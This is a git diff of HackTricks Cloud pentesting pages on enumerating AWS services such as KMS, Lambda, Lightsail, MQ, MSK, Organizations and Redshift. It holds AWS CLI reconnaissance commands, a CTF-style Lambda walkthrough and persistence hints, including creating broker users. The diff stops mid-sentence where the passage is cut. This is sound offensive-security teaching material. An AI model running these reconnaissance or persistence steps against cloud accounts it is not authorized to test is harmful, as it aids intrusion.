../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md new file mode 100644 index 000000000..b64eee2d5 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md @@ -0,0 +1,158 @@ +# AWS - KMS Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## KMS - Key Management Service + +AWS Key Management Service (AWS KMS) is presented as a managed service, simplifying the process for users to **create and manage customer master keys** (CMKs). These CMKs are integral in the encryption of user data. A notable feature of AWS KMS is that CMKs are predominantly **secured by hardware security modules** (HSMs), enhancing the protection of the encryption keys. + +KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**. + +KMS is a **region specific service**. + +**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used. + +**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data. + +A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK. + +There are 2 types of master keys: + +- **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. Rotates every 3 years and it's not possible to change it. +- **Customer manager CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys. + +**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**. + +### Key Policies + +These defines **who can use and access a key in KMS**. + +By **default:** + +- It gives the **IAM of the** **AWS account that owns the KMS key access** to manage the access to the KMS key via IAM. + + Unlike other AWS resource policies, a AWS **KMS key policy does not automatically give permission any of the principals of the account**. To give permission to account administrators, the **key policy must include an explicit statement** that provides this permission, like this one. + + - Without allowing the account(`"AWS": "arn:aws:iam::111122223333:root"`) IAM permissions won't work. + +- It **allows the account to use IAM policies** to allow access to the KMS key, in addition to the key policy. + + **Without this permission, IAM policies that allow access to the key are ineffective**, although IAM policies that deny access to the key are still effective. + +- It **reduces the risk of the key becoming unmanageable** by giving access control permission to the account administrators, including the account root user, which cannot be deleted. + +**Default policy** example: + +```json +{ + "Sid": "Enable IAM policies", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::111122223333:root" + }, + "Action": "kms:*", + "Resource": "*" +} +``` + +> [!WARNING] +> If the **account is allowed** (`"arn:aws:iam::111122223333:root"`) a **principal** from the account **will still need IAM permissions** to use the KMS key. However, if the **ARN** of a role for example is **specifically allowed** in the **Key Policy**, that role **doesn't need IAM permissions**. + +
+ +Policy Details + +Properties of a policy: + +- JSON based document +- Resource --> Affected resources (can be "\*") +- Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions) +- Effect --> Allow/Deny +- Principal --> arn affected +- Conditions (optional) --> Condition to give the permissions + +Grants: + +- Allow to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. It can be indicated the CMK identifier, the grantee principal and the required level of opoeration (Decrypt, Encrypt, GenerateDataKey...) +- After the grant is created a GrantToken and a GratID are issued + +**Access**: + +- Via **key policy** -- If this exist, this takes **precedent** over the IAM policy +- Via **IAM policy** +- Via **grants** + +
+ +### Key Administrators + +Key administrator by default: + +- Have access to manage KMS but not to encrypt or decrypt data +- Only IAM users and roles can be added to Key Administrators list (not groups) +- If external CMK is used, Key Administrators have the permission to import key material + +### Rotation of CMKs + +- The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases. +- **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed. +- **Older keys are retained** to decrypt data that was encrypted prior to the rotation +- In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**. +- If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled. + +#### Manual rotation + +- A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID. +- To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to. +- You need to **keep old keys to decrypt old files** encrypted with it. + +You can import keys from your on-premises key infrastructure . + +### Other relevant KMS information + +KMS is priced per number of encryption/decryption requests received from all services per month. + +KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS. + +With KMS policy you can do the following: + +- Limit who can create data keys and which services have access to use these keys +- Limit systems access to encrypt only, decrypt only or both +- Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions). + +You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region. + +### Enumeration + +```bash +aws kms list-keys +aws kms list-key-policies --key-id +aws kms list-grants --key-id +aws kms describe-key --key-id +aws kms get-key-policy --key-id --policy-name # Default policy name is "default" +aws kms describe-custom-key-stores +``` + +### Privesc + +{{#ref}} +../aws-privilege-escalation/aws-kms-privesc.md +{{#endref}} + +### Post Exploitation + +{{#ref}} +../aws-post-exploitation/aws-kms-post-exploitation.md +{{#endref}} + +### Persistence + +{{#ref}} +../aws-persistence/aws-kms-persistence.md +{{#endref}} + +## References + +- [https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md similarity index 69% rename from pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md index 34a5e0cc7..8888e1a5d 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md @@ -1,19 +1,6 @@ # AWS - Lambda Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Lambda @@ -29,7 +16,7 @@ A Lambda can have **several versions**.\ And it can have **more than 1** version exposed via **aliases**. The **weights** of **each** of the **versions** exposed inside and alias will decide **which alias receive the invocation** (it can be 90%-10% for example).\ If the code of **one** of the aliases is **vulnerable** you can send **requests until the vulnerable** versions receives the exploit. -![](<../../../.gitbook/assets/image (223).png>) +![](<../../../images/image (223).png>) ### Resource Policies @@ -65,8 +52,8 @@ Functions deployed as a container image do not use layers. Instead, you package Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**. -* **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. -* **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. +- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. +- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. ### Enumeration @@ -135,7 +122,7 @@ Now it's time to find out possible lambda functions to execute: aws --region us-west-2 --profile level6 lambda list-functions ``` -![](<../../../.gitbook/assets/image (262).png>) +![](<../../../images/image (262).png>) A lambda function called "Level6" is available. Lets find out how to call it: @@ -143,7 +130,7 @@ A lambda function called "Level6" is available. Lets find out how to call it: aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6 ``` -![](<../../../.gitbook/assets/image (102).png>) +![](<../../../images/image (102).png>) Now, that you know the name and the ID you can get the Name: @@ -151,7 +138,7 @@ Now, that you know the name and the ID you can get the Name: aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75" ``` -![](<../../../.gitbook/assets/image (237).png>) +![](<../../../images/image (237).png>) And finally call the function accessing (notice that the ID, Name and function-name appears in the URL): [https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6](https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6) @@ -161,50 +148,37 @@ And finally call the function accessing (notice that the ID, Name and function-n There are a lot of other sources that can trigger a lambda -
+
### Privesc In the following page you can check how to **abuse Lambda permissions to escalate privileges**: -{% content-ref url="../aws-privilege-escalation/aws-lambda-privesc.md" %} -[aws-lambda-privesc.md](../aws-privilege-escalation/aws-lambda-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-lambda-privesc.md +{{#endref}} ### Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md" %} -[aws-lambda-unauthenticated-access.md](../aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md +{{#endref}} ### Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-lambda-post-exploitation/" %} -[aws-lambda-post-exploitation](../aws-post-exploitation/aws-lambda-post-exploitation/) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-lambda-post-exploitation/ +{{#endref}} ### Persistence -{% content-ref url="../aws-persistence/aws-lambda-persistence/" %} -[aws-lambda-persistence](../aws-persistence/aws-lambda-persistence/) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-lambda-persistence/ +{{#endref}} ## References -* [https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer](https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer) -* [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) +- [https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer](https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer) +- [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md new file mode 100644 index 000000000..404f14c10 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md @@ -0,0 +1,59 @@ +# AWS - Lightsail Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## AWS - Lightsail + +Amazon Lightsail provides an **easy**, lightweight way for new cloud users to take advantage of AWS’ cloud computing services. It allows you to deploy common and custom web services in seconds via **VMs** (**EC2**) and **containers**.\ +It's a **minimal EC2 + Route53 + ECS**. + +### Enumeration + +```bash +# Instances +aws lightsail get-instances #Get all +aws lightsail get-instance-port-states --instance-name #Get open ports + +# Databases +aws lightsail get-relational-databases +aws lightsail get-relational-database-snapshots +aws lightsail get-relational-database-parameters + +# Disk & snapshots +aws lightsail get-instance-snapshots +aws lightsail get-disk-snapshots +aws lightsail get-disks + +# More +aws lightsail get-load-balancers +aws lightsail get-static-ips +aws lightsail get-key-pairs +``` + +### Analyse Snapshots + +It's possible to generate **instance and relational database snapshots from lightsail**. Therefore you can check those the same way you can check [**EC2 snapshots**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) and [**RDS snapshots**](aws-relational-database-rds-enum.md#enumeration). + +### Metadata + +**Metadata endpoint is accessible from lightsail**, but the machines are running in an **AWS account managed by AWS** so you don't control **what permissions are being granted**. However, if you find a way to exploit those you would be directly exploiting AWS. + +### Privesc + +{{#ref}} +../aws-privilege-escalation/aws-lightsail-privesc.md +{{#endref}} + +### Post Exploitation + +{{#ref}} +../aws-post-exploitation/aws-lightsail-post-exploitation.md +{{#endref}} + +### Persistence + +{{#ref}} +../aws-persistence/aws-lightsail-persistence.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md new file mode 100644 index 000000000..8e221776a --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md @@ -0,0 +1,76 @@ +# AWS - MQ Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Amazon MQ + +### Introduction to Message Brokers + +**Message brokers** serve as intermediaries, facilitating communication between different software systems, which may be built on varied platforms and programmed in different languages. **Amazon MQ** simplifies the deployment, operation, and maintenance of message brokers on AWS. It provides managed services for **Apache ActiveMQ** and **RabbitMQ**, ensuring seamless provisioning and automatic software version updates. + +### AWS - RabbitMQ + +RabbitMQ is a prominent **message-queueing software**, also known as a _message broker_ or _queue manager_. It's fundamentally a system where queues are configured. Applications interface with these queues to **send and receive messages**. Messages in this context can carry a variety of information, ranging from commands to initiate processes on other applications (potentially on different servers) to simple text messages. The messages are held by the queue-manager software until they are retrieved and processed by a receiving application. AWS provides an easy-to-use solution for hosting and managing RabbitMQ servers. + +### AWS - ActiveMQ + +Apache ActiveMQ® is a leading open-source, Java-based **message broker** known for its versatility. It supports multiple industry-standard protocols, offering extensive client compatibility across a wide array of languages and platforms. Users can: + +- Connect with clients written in JavaScript, C, C++, Python, .Net, and more. +- Leverage the **AMQP** protocol to integrate applications from different platforms. +- Use **STOMP** over websockets for web application message exchanges. +- Manage IoT devices with **MQTT**. +- Maintain existing **JMS** infrastructure and extend its capabilities. + +ActiveMQ's robustness and flexibility make it suitable for a multitude of messaging requirements. + +## Enumeration + +```bash +# List brokers +aws mq list-brokers + +# Get broker info +aws mq describe-broker --broker-id +## Find endpoints in .BrokerInstances +## Find if public accessible in .PubliclyAccessible + +# List usernames (only for ActiveMQ) +aws mq list-users --broker-id + +# Get user info (PASSWORD NOT INCLUDED) +aws mq describe-user --broker-id --username + +# Lits configurations (only for ActiveMQ) +aws mq list-configurations +## Here you can find if simple or LDAP authentication is used + +# Creacte Active MQ user +aws mq create-user --broker-id --password --username --console-access +``` + +> [!WARNING] +> TODO: Indicate how to enumerate RabbitMQ and ActiveMQ internally and how to listen in all queues and send data (send PR if you know how to do this) + +## Privesc + +{{#ref}} +../aws-privilege-escalation/aws-mq-privesc.md +{{#endref}} + +## Unauthenticated Access + +{{#ref}} +../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md +{{#endref}} + +## Persistence + +If you know the credentials to access the RabbitMQ web console, you can create a new user qith admin privileges. + +## References + +- [https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html](https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html) +- [https://activemq.apache.org/](https://activemq.apache.org/) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md similarity index 59% rename from pentesting-cloud/aws-security/aws-services/aws-msk-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md index 4e2cae977..ca0098630 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md @@ -1,19 +1,6 @@ # AWS - MSK Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Amazon MSK @@ -27,9 +14,9 @@ There are 2 types of Kafka clusters that AWS allows to create: Provisioned and S From the point of view of an attacker you need to know that: -* **Serverless cannot be directly public** (it can only run in a VPN without any publicly exposed IP). However, **Provisioned** can be configured to get a **public IP** (by default it doesn't) and configure the **security group** to **expose** the relevant ports. -* **Serverless** **only support IAM** as authentication method. **Provisioned** support SASL/SCRAM (**password**) authentication, **IAM** authentication, AWS **Certificate** Manager (ACM) authentication and **Unauthenticated** access. - * Note that it's not possible to expose publicly a Provisioned Kafka if unauthenticated access is enabled +- **Serverless cannot be directly public** (it can only run in a VPN without any publicly exposed IP). However, **Provisioned** can be configured to get a **public IP** (by default it doesn't) and configure the **security group** to **expose** the relevant ports. +- **Serverless** **only support IAM** as authentication method. **Provisioned** support SASL/SCRAM (**password**) authentication, **IAM** authentication, AWS **Certificate** Manager (ACM) authentication and **Unauthenticated** access. + - Note that it's not possible to expose publicly a Provisioned Kafka if unauthenticated access is enabled ### Enumeration @@ -65,7 +52,7 @@ aws kafka list-scram-secrets --cluster-arn wget https://archive.apache.org/dist/kafka/2.8.1/kafka_2.12-2.8.1.tgz tar -xzf kafka_2.12-2.8.1.tgz -# In kafka_2.12-2.8.1/libs download the MSK IAM JAR file. +# In kafka_2.12-2.8.1/libs download the MSK IAM JAR file. cd kafka_2.12-2.8.1/libs wget https://github.com/aws/aws-msk-iam-auth/releases/download/v1.1.1/aws-msk-iam-auth-1.1.1-all.jar @@ -91,15 +78,15 @@ kafka_2.12-2.8.1/bin/kafka-console-consumer.sh --bootstrap-server $BS --consumer ### Privesc -{% content-ref url="../aws-privilege-escalation/aws-msk-privesc.md" %} -[aws-msk-privesc.md](../aws-privilege-escalation/aws-msk-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-msk-privesc.md +{{#endref}} ### Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md" %} -[aws-msk-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md +{{#endref}} ### Persistence @@ -107,19 +94,6 @@ If you are going to **have access to the VPC** where a Provisioned Kafka is, you ## References -* [https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html](https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html) +- [https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html](https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md new file mode 100644 index 000000000..445b9c5df --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md @@ -0,0 +1,47 @@ +# AWS - Organizations Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Baisc Information + +AWS Organizations facilitates the creation of new AWS accounts without incurring additional costs. Resources can be allocated effortlessly, accounts can be efficiently grouped, and governance policies can be applied to individual accounts or groups, enhancing management and control within the organization. + +Key Points: + +- **New Account Creation**: AWS Organizations allows the creation of new AWS accounts without extra charges. +- **Resource Allocation**: It simplifies the process of allocating resources across the accounts. +- **Account Grouping**: Accounts can be grouped together, making management more streamlined. +- **Governance Policies**: Policies can be applied to accounts or groups of accounts, ensuring compliance and governance across the organization. + +You can find more information in: + +{{#ref}} +../aws-basic-information/ +{{#endref}} + +```bash +# Get Org +aws organizations describe-organization +aws organizations list-roots + +# Get OUs, from root and from other OUs +aws organizations list-organizational-units-for-parent --parent-id r-lalala +aws organizations list-organizational-units-for-parent --parent-id ou-n8s9-8nzv3a5y + +# Get accounts +## List all the accounts without caring about the parent +aws organizations list-accounts +## Accounts from a parent +aws organizations list-accounts-for-parent --parent-id r-lalala +aws organizations list-accounts-for-parent --parent-id ou-n8s9-8nzv3a5y + +# Get basic account info +## You need the permission iam:GetAccountSummary +aws iam get-account-summary +``` + +## References + +- https://aws.amazon.com/organizations/ + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md new file mode 100644 index 000000000..8e2042191 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md @@ -0,0 +1,24 @@ +# AWS - Other Services Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Directconnect + +Allows to **connect a corporate private network with AWS** (so you could compromise an EC2 instance and access the corporate network). + +``` +aws directconnect describe-connections +aws directconnect describe-interconnects +aws directconnect describe-virtual-gateways +aws directconnect describe-virtual-interfaces +``` + +## Support + +In AWS you can access current and previous support cases via the API + +``` +aws support describe-cases --include-resolved-cases +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md similarity index 70% rename from pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md index 3580f80fd..37304bdad 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md @@ -1,19 +1,6 @@ # AWS - Redshift Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Amazon Redshift @@ -98,28 +85,15 @@ psql -h redshift-cluster-1.sdflju3jdfkfg.us-east-1.redshift.amazonaws.com -U adm ## Privesc -{% content-ref url="../aws-privilege-escalation/aws-redshift-privesc.md" %} -[aws-redshift-privesc.md](../aws-privilege-escalation/aws-redshift-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-redshift-privesc.md +{{#endref}} ## Persistence The following actions allow to grant access to other AWS accounts to the cluster: -* [authorize-endpoint-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-endpoint-access.html) -* [authorize-snapshot-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-snapshot-access.html) +- [authorize-endpoint-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-endpoint-access.html) +- [authorize-snapshot-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-snapshot-access.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md similarity index 53% rename from pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md index 2b1ff5644..a91ada4e0 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md @@ -1,19 +1,6 @@ # AWS - Relational Database (RDS) Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information @@ -23,29 +10,29 @@ AWS RDS supports various widely-used relational database engines including MySQL Key features of RDS include: -* **Management of database instances** is simplified. -* Creation of **read replicas** to enhance read performance. -* Configuration of **multi-Availability Zone (AZ) deployments** to ensure high availability and failover mechanisms. -* **Integration** with other AWS services, such as: - * AWS Identity and Access Management (**IAM**) for robust access control. - * AWS **CloudWatch** for comprehensive monitoring and metrics. - * AWS Key Management Service (**KMS**) for ensuring encryption at rest. +- **Management of database instances** is simplified. +- Creation of **read replicas** to enhance read performance. +- Configuration of **multi-Availability Zone (AZ) deployments** to ensure high availability and failover mechanisms. +- **Integration** with other AWS services, such as: + - AWS Identity and Access Management (**IAM**) for robust access control. + - AWS **CloudWatch** for comprehensive monitoring and metrics. + - AWS Key Management Service (**KMS**) for ensuring encryption at rest. ## Credentials When creating the DB cluster the master **username** can be configured (**`admin`** by default). To generate the password of this user you can: -* **Indicate** a **password** yourself -* Tell RDS to **auto generate** it -* Tell 